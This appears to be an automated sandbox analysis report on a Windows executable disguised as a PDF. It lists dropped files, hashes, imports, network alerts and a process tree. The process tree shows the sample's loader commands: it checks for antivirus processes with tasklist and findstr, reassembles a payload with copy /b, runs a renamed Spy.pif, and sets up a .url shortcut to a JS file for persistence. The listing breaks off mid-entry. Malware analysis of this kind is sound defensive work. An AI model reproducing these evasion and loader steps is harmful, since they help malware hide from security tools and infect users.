                                                SHA-256:4B9785E33AB65B14ABD3167EFBBF6DB248B3E36B30A32FDB0105AC29FF51615E
                                                SHA-512:E515A5E58ECD18B089B52AF3E8ADE5DE97474736DFCA896FD5C1043C79347916FC2CFA53B658B058833D0F9E1B8D542BA8F56D749B318399A71E6034CE282194
                                                Malicious:false
                                                Preview:..".".......}.......a.........(..4D.wU_;....F...3....;...m.=...[.F...m..X^U^...I...B..8.J..KC.h..jY........6....f.. w\.%.YZK...Qg.p..2Y:8p_.]5...Dv6.A.g.zR..iw.wI..n..1q..}).4.b.....R.U..}r.7...s.....-#:.....e..........m+....l./n....Y...... R....H.d..f.;.......k.}*..H..J.g|...6..F....R...i.7..E7.f.R...n..O.....o......:r......B.3b..f..d1H{...5..*...............M....xB.' . .r.5..Ded.m...K.!\T..|...dt.v..i...B...K..7.'..+.F.......5.Js.H..q..m..............q.s'.tCk*3..e...IQ..E....?..|{.6...'.w.w..a....H..aM...w..^I..a...&.).F..."s7..P.....e.Z...e..X@W(.-...o.5'/x.......;..A`^..Cj..}.?.s3...s..P_..o...M>.f....N..Y.,..{C.F.].7.Y.g..;...g.$pu......t......Bb....Y.U.(#...S-3.~..4..Yz.!..4.A5Y/..j.4....d..#.......Y\Syu...E.........m....F..n.U.2P..g.....,({..o......d. ..s.f..Q.T.....n8V ........*...J..._.o.N..T....q._].U[ndvKy.......%.....m.|3......2i....5<.\wN...h.3....-......0]N.Y....|...`...".8..fI#.ww...y:~>..`.Z....^....h....Xv6c.9..3U..
                                                Process:C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):886916
                                                Entropy (8bit):6.622152202054227
                                                Encrypted:false
                                                SSDEEP:12288:HV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:1xz1JMyyzlohMf1tN70aw8501
                                                MD5:3E017BD65EDFF0C040B35106A5C834AB
                                                SHA1:13A2011D56607D8315A96D3FE649D94B5C92535B
                                                SHA-256:961732D6B3C27D17BE771FC4347FD0B7C8D7A86F2FF9A3A6447553927E56E447
                                                SHA-512:B163879943E2778A2D682815DEA2FA15523CAB3F364E244CD6E508E6C99D1CB4BC466796443962E959BDA7EEDFCC3578218CA2DFF382485C632D55009B7BF671
                                                Malicious:false
                                                Preview:...j..u...8.I.j.....I._^[..]..........t....j...........E...sL.k.C.P&@.W&@..%@...C..%@.W&@................................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....;.|.....a....}..t...|...;............}..t......._^[..]....}....t.....x...|......U...M.VW...........|P;......H.Bt.......t<.u..@....M.....B`....8.t".....|.;........Bt....8.t..._^]...2...U..V..W.}.;............Ft.......t.Q.?....Ft.... .......;.....u?...|..Ft......8.u.O......}..........Nx.Nx.Ft.4......FtY.Nx.$...~x.v..Nx.Ft.D...8.t._^]..................j...U..Q..(xL.VW9.0xL.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91
                                                Process:C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6725
                                                Entropy (8bit):6.182223398021148
                                                Encrypted:false
                                                SSDEEP:192:97HAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMM:97HAHhww+/2nlP3r1W7
                                                MD5:E705FAE954799FD7B4782DC9FFA24252
                                                SHA1:03BEDEB38DF07BC6C99A7EA031DDC070A929F8FA
                                                SHA-256:D33FEA9A49EB3992712B778354C6CD3D295914F4A8A8233AB6EE40DD6658F4D7
                                                SHA-512:4585A7959D13D2E5AAE9C054CED4FD76AF9B6CA3191E2E95983F324255D18D2D8F130574D2DF81E0D457B1BDCB2ED1F782A344FF8F0ED850726131F3200EB119
                                                Malicious:false
                                                Preview:venezuelalandscapesmeantposters..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B...............................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
                                                File Type:ASCII text, with very long lines (579), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):14057
                                                Entropy (8bit):5.1259091890276025
                                                Encrypted:false
                                                SSDEEP:384:aWnlPWFmCQNn03GQgWn7T9pNKXt7eyXltROCzs0+aPvwDg5N3s:aWnlPWFmCQN03UO7heXrDRZvwmN8
                                                MD5:06A9A6DC642BD8A1484F766845040DDF
                                                SHA1:A187C475793221D9A6B1591F0D9EF1F63E98E356
                                                SHA-256:C3C049F72B5BCDE6CC340DA0DE09FC83DA25D29EB967DC55F40D7F54514672D7
                                                SHA-512:D8E28ECD387C128F1B4E871E0BC5F89D23866D1645B1DA4A6A090F122EB76B3E99C8CA76B3C3B7DB0FDE36515069965BF79A1B67114ACE7AD4CEA2D9265D0CEB
                                                Malicious:false
                                                Preview:Set Uses=V..XPAmateur-Refined-Alternatively-Census-Mail-Participate-Edwards-Jamaica-North-..BiEgg-Subaru-Facing-Developers-Gt-Honor-..gVgDiversity-Greene-Organ-Increases-Exempt-Gnu-Particles-Details-..VWExplorer-Tamil-..IPoSimply-Liberty-Races-Fares-Moss-Express-Monitors-..GBzBulgarian-Infectious-Cock-Tablet-Cattle-Adolescent-..okAgRehab-..KqzRolling-..Set Choosing= ..dmBDLands-Compatibility-Senegal-Adjustment-Retention-..ivAsMonaco-Easy-Banned-..DEwSacred-Renaissance-Delta-Possess-Budgets-Es-Acoustic-..ujGeo-Meal-Greece-Sleeps-..ycJVBikini-Vote-Dividend-Wheels-Preview-Dirty-Modified-Children-Affordable-..LnSectors-Prove-Dip-Lauderdale-Porno-Proposed-Reproduced-Skype-..lrProhibited-Committee-Intervals-Deviant-Institution-Cholesterol-Til-Bitch-Promoting-..OYKvHurt-..Set Corp=7..DgnjSmoke-Fortune-Zoophilia-Habitat-Sail-..krDSArbitrary-Discussing-Corn-Duo-Americas-Alot-Brussels-Practice-Handmade-..XyhRFundamental-Looks-Anne-Sharp-Venezuela-Abuse-Seattle-..XRQnTracker-Pirates-Acdbentity-Se
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:ASCII text, with very long lines (579), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):14057
                                                Entropy (8bit):5.1259091890276025
                                                Encrypted:false
                                                SSDEEP:384:aWnlPWFmCQNn03GQgWn7T9pNKXt7eyXltROCzs0+aPvwDg5N3s:aWnlPWFmCQN03UO7heXrDRZvwmN8
                                                MD5:06A9A6DC642BD8A1484F766845040DDF
                                                SHA1:A187C475793221D9A6B1591F0D9EF1F63E98E356
                                                SHA-256:C3C049F72B5BCDE6CC340DA0DE09FC83DA25D29EB967DC55F40D7F54514672D7
                                                SHA-512:D8E28ECD387C128F1B4E871E0BC5F89D23866D1645B1DA4A6A090F122EB76B3E99C8CA76B3C3B7DB0FDE36515069965BF79A1B67114ACE7AD4CEA2D9265D0CEB
                                                Malicious:false
                                                Preview:Set Uses=V..XPAmateur-Refined-Alternatively-Census-Mail-Participate-Edwards-Jamaica-North-..BiEgg-Subaru-Facing-Developers-Gt-Honor-..gVgDiversity-Greene-Organ-Increases-Exempt-Gnu-Particles-Details-..VWExplorer-Tamil-..IPoSimply-Liberty-Races-Fares-Moss-Express-Monitors-..GBzBulgarian-Infectious-Cock-Tablet-Cattle-Adolescent-..okAgRehab-..KqzRolling-..Set Choosing= ..dmBDLands-Compatibility-Senegal-Adjustment-Retention-..ivAsMonaco-Easy-Banned-..DEwSacred-Renaissance-Delta-Possess-Budgets-Es-Acoustic-..ujGeo-Meal-Greece-Sleeps-..ycJVBikini-Vote-Dividend-Wheels-Preview-Dirty-Modified-Children-Affordable-..LnSectors-Prove-Dip-Lauderdale-Porno-Proposed-Reproduced-Skype-..lrProhibited-Committee-Intervals-Deviant-Institution-Cholesterol-Til-Bitch-Promoting-..OYKvHurt-..Set Corp=7..DgnjSmoke-Fortune-Zoophilia-Habitat-Sail-..krDSArbitrary-Discussing-Corn-Duo-Americas-Alot-Brussels-Practice-Handmade-..XyhRFundamental-Looks-Anne-Sharp-Venezuela-Abuse-Seattle-..XRQnTracker-Pirates-Acdbentity-Se
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >), ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):100
                                                Entropy (8bit):4.776014505759607
                                                Encrypted:false
                                                SSDEEP:3:HRAbABGQaFyw3pYoN+E2J5rYFAeGd+UbIFc:HRYF5yjoN723cFRILbF
                                                MD5:2A5A23A239972BD7B3931A9281593673
                                                SHA1:EAF817F918C619CE815E4A0C7B33890E8B27EBC7
                                                SHA-256:AEA220511E27DB677B560C6B39CDD1BBFD54F3CC8CBBC0A3C69D52B8EDADA267
                                                SHA-512:A3F60FDBA82BE6DBA616AC42FE89E9A3B69E1EF705E63910E4FD8CBB76F7AAD47B11820B35079789D3627675ECEBE1DAC22B99504DF4A147FCA9E11A85B9E69A
                                                Malicious:true
                                                Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" ..
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.970394348387481
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:scan_doc_zapit_836893.pdf.exe
                                                File size:1'039'137 bytes
                                                MD5:cbcb0ff5aa471e22a6b129196a556d97
                                                SHA1:b3dca2cac1624e6a8b318708c02376c1eb6ab784
                                                SHA256:5c1ce789a60371e388881ffbe0311bd2829e5e8dbaf77506929e50638f22d866
                                                SHA512:b98bb17994d5fdf38cb3a181bc15c3f64779aa33f7a508d1a9ce1e2ab1b1a2d9260c2dcdaf8c4f597738827a4df6f906c55903dfdc0da9216e3f656b8e0a73e0
                                                SSDEEP:24576:B6p9TyXofw1dupRAygiMPlqD8j0DbxqmELM+cYbaD:0XyXo6dupOeMPlqQjexqmEBaD
                                                TLSH:4A2523158F812835DAAA09717CB62A331BA6BF1609F4C51B4384CA3C7E32BD7535D7B2
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                Icon Hash:6066ced2d0c4fc0c
                                                Entrypoint:0x403883
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                Signature Valid:
                                                Signature Issuer:
                                                Signature Validation Error:
                                                Error Number:
                                                Not Before, Not After
                                                  Subject Chain
                                                    Version:
                                                    Thumbprint MD5:
                                                    Thumbprint SHA-1:
                                                    Thumbprint SHA-256:
                                                    Serial:
                                                    Instruction
                                                    sub esp, 000002D4h
                                                    push ebx
                                                    push ebp
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    xor ebp, ebp
                                                    pop esi
                                                    mov dword ptr [esp+18h], ebp
                                                    mov dword ptr [esp+10h], 00409268h
                                                    mov dword ptr [esp+14h], ebp
                                                    call dword ptr [00408030h]
                                                    push 00008001h
                                                    call dword ptr [004080B4h]
                                                    push ebp
                                                    call dword ptr [004082C0h]
                                                    push 00000008h
                                                    mov dword ptr [00472EB8h], eax
                                                    call 00007F1FC47FC93Bh
                                                    push ebp
                                                    push 000002B4h
                                                    mov dword ptr [00472DD0h], eax
                                                    lea eax, dword ptr [esp+38h]
                                                    push eax
                                                    push ebp
                                                    push 00409264h
                                                    call dword ptr [00408184h]
                                                    push 0040924Ch
                                                    push 0046ADC0h
                                                    call 00007F1FC47FC61Dh
                                                    call dword ptr [004080B0h]
                                                    push eax
                                                    mov edi, 004C30A0h
                                                    push edi
                                                    call 00007F1FC47FC60Bh
                                                    push ebp
                                                    call dword ptr [00408134h]
                                                    cmp word ptr [004C30A0h], 0022h
                                                    mov dword ptr [00472DD8h], eax
                                                    mov eax, edi
                                                    jne 00007F1FC47F9F0Ah
                                                    push 00000022h
                                                    pop esi
                                                    mov eax, 004C30A2h
                                                    push esi
                                                    push eax
                                                    call 00007F1FC47FC2E1h
                                                    push eax
                                                    call dword ptr [00408260h]
                                                    mov esi, eax
                                                    mov dword ptr [esp+1Ch], esi
                                                    jmp 00007F1FC47F9F93h
                                                    push 00000020h
                                                    pop ebx
                                                    cmp ax, bx
                                                    jne 00007F1FC47F9F0Ah
                                                    add esi, 02h
                                                    cmp word ptr [esi], bx
                                                    Programming Language:
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [ C ] VS2010 SP1 build 40219
                                                    • [RES] VS2010 SP1 build 40219
                                                    • [LNK] VS2010 SP1 build 40219
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000xf2c2.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xecab90x2868.ndata
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0xf40000xf2c20xf400aec88f3b454ad504386a8a8bb6fc80ffFalse0.8862704918032787data7.535669064709142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x1040000xf320x100000f8dff5d6dd3420f4cf2356b4d746eeFalse0.590576171875data5.421574592155926IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0xf42680x8cfaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9912718204488778
                                                    RT_ICON0xfcf640x2495PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001174586225307
                                                    RT_ICON0xff3fc0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5916395443449959
                                                    RT_ICON0x101a640x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6641621129326047
                                                    RT_DIALOG0x102b8c0x100dataEnglishUnited States0.5234375
                                                    RT_DIALOG0x102c8c0x11cdataEnglishUnited States0.6056338028169014
                                                    RT_DIALOG0x102da80x60dataEnglishUnited States0.7291666666666666
                                                    RT_GROUP_ICON0x102e080x3edataEnglishUnited States0.8225806451612904
                                                    RT_VERSION0x102e480x1a4dataEnglishUnited States0.5642857142857143
                                                    RT_MANIFEST0x102fec0x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                    DLLImport
                                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-10-31T14:37:56.122278+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.649744TCP
                                                    2024-10-31T14:38:36.677956+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.649920TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 31, 2024 14:37:44.137069941 CET5985853192.168.2.61.1.1.1
                                                    Oct 31, 2024 14:37:44.151463032 CET53598581.1.1.1192.168.2.6
                                                    Oct 31, 2024 14:38:02.072853088 CET6067853192.168.2.61.1.1.1
                                                    Oct 31, 2024 14:38:02.086817026 CET53606781.1.1.1192.168.2.6
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 31, 2024 14:37:44.137069941 CET192.168.2.61.1.1.10xf93fStandard query (0)EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKuA (IP address)IN (0x0001)false
                                                    Oct 31, 2024 14:38:02.072853088 CET192.168.2.61.1.1.10xd262Standard query (0)EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKuA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 31, 2024 14:37:44.151463032 CET1.1.1.1192.168.2.60xf93fName error (3)EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKunonenoneA (IP address)IN (0x0001)false
                                                    Oct 31, 2024 14:38:02.086817026 CET1.1.1.1192.168.2.60xd262Name error (3)EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKunonenoneA (IP address)IN (0x0001)false

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:09:37:35
                                                    Start date:31/10/2024
                                                    Path:C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe"
                                                    Imagebase:0x400000
                                                    File size:1'039'137 bytes
                                                    MD5 hash:CBCB0FF5AA471E22A6B129196A556D97
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:09:37:37
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
                                                    Imagebase:0x1c0000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:09:37:37
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:09:37:38
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:tasklist
                                                    Imagebase:0xc70000
                                                    File size:79'360 bytes
                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:09:37:38
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:findstr /I "wrsa opssvc"
                                                    Imagebase:0xd0000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:09:37:39
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:tasklist
                                                    Imagebase:0xc70000
                                                    File size:79'360 bytes
                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:09:37:39
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                    Imagebase:0xd0000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:09:37:39
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /c md 185027
                                                    Imagebase:0x1c0000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:09:37:39
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:findstr /V "venezuelalandscapesmeantposters" Tournaments
                                                    Imagebase:0xd0000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:09:37:40
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
                                                    Imagebase:0x1c0000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:09:37:40
                                                    Start date:31/10/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\185027\Spy.pif
                                                    Wow64 process (32bit):true
                                                    Commandline:Spy.pif H
                                                    Imagebase:0xa80000
                                                    File size:893'608 bytes
                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 5%, ReversingLabs
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:12
                                                    Start time:09:37:40
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\SysWOW64\choice.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:choice /d y /t 5
                                                    Imagebase:0x590000
                                                    File size:28'160 bytes
                                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:09:37:41
                                                    Start date:31/10/2024
